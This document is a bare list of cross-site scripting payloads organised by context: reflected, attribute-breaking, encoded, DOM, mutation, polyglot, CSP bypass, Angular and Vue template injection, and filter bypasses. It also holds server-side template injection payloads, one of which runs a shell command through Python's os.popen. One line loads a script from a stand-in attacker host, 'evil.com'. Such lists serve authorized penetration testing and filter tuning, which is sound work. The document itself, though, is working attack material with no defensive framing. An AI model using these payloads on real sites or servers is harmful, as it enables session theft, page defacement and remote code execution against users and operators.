# XSS payloads — reflected, stored, DOM-based, CSP bypass, template injection

# --- Classic reflected ---
<script>alert(1)</script>
<script>alert`1`</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<svg/onload=alert(1)>
<body onload=alert(1)>
<iframe src=javascript:alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<keygen onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>

# --- Attribute-context break ---
" onmouseover=alert(1) x="
" onfocus=alert(1) autofocus "
'><script>alert(1)</script>
' onmouseover='alert(1)
\" onmouseover=alert(1) \"
 onload=alert(1)

# --- Tag-less (when script tags stripped) ---
javascript:alert(1)
javascript:alert`1`
javascript://comment%0aalert(1)
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

# --- Encoded variants (bypass simple blacklist) ---
%3Cscript%3Ealert(1)%3C/script%3E
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
\x3cscript\x3ealert(1)\x3c/script\x3e
\u003cscript\u003ealert(1)\u003c/script\u003e

# --- Event handler variants ---
<img src=x onerror=\"alert(1)\">
<img src=x onerror=alert(1);>
<img src=x onerror=\"alert(String.fromCharCode(88,83,83))\">
<img src=x:x onerror=alert(1)>
<img src=/ onerror=alert(1)>
<img src=# onerror=alert(1)>
<img%20src=x%20onerror=alert(1)>
<img src=x onerror=top.alert(1)>
<img src=x onerror=window[\"alert\"](1)>

# --- DOM XSS sinks ---
"><img src=x onerror=alert(document.domain)>
#<script>alert(1)</script>
#<img src=x onerror=alert(1)>
?x=<script>alert(1)</script>
#x=<img src=x onerror=alert(1)>
javascript:eval(atob('YWxlcnQoMSk='))

# --- Mutation XSS (mXSS) ---
<listing>&lt;img src=x onerror=alert(1)&gt;
<noscript><img src=x onerror=alert(1)></noscript>
<noembed><img src=x onerror=alert(1)></noembed>
<xmp><img src=x onerror=alert(1)></xmp>
<!--><script>alert(1)</script>

# --- Polyglots ---
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
'-alert(1)-'
\";alert(1);//
</script><script>alert(1)</script>
"><svg/onload=alert(1)>
</textarea><script>alert(1)</script>
</title><script>alert(1)</script>

# --- CSP bypass patterns ---
<script src=\"data:,alert(1)\"></script>
<link rel=\"import\" href=\"data:text/html,<script>alert(1)</script>\">
<object data=\"data:text/html,<script>alert(1)</script>\">
<iframe src=\"data:text/html,<script>alert(1)</script>\"></iframe>
<base href=\"javascript:alert(1);//\">
<script src=\"//evil.com/x.js\"></script>

# --- Angular template injection ---
{{constructor.constructor('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{''.constructor.prototype.charAt=[].join;$eval(\"x=alert(1)\");}}

# --- Vue template injection ---
{{_c.constructor('alert(1)')()}}
{{[].constructor.constructor('alert(1)')()}}

# --- Server-Side Template (SSTI) to RCE ---
{{7*7}}
${7*7}
#{7*7}
<%= 7*7 %>
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

# --- HTML injection (low-severity but useful to detect) ---
<h1>injection</h1>
<u>test</u>
<!--test-->

# --- Common input filter bypasses ---
<scr<script>ipt>alert(1)</scr</script>ipt>
<ScRiPt>alert(1)</ScRiPt>
<script >alert(1)</script >
<script/x>alert(1)</script>
<script~>alert(1)</script>
<svg><script>alert&#40;1&#41;</script>
<img src=x onerror=\"&#97;&#108;&#101;&#114;&#116;(1)\">
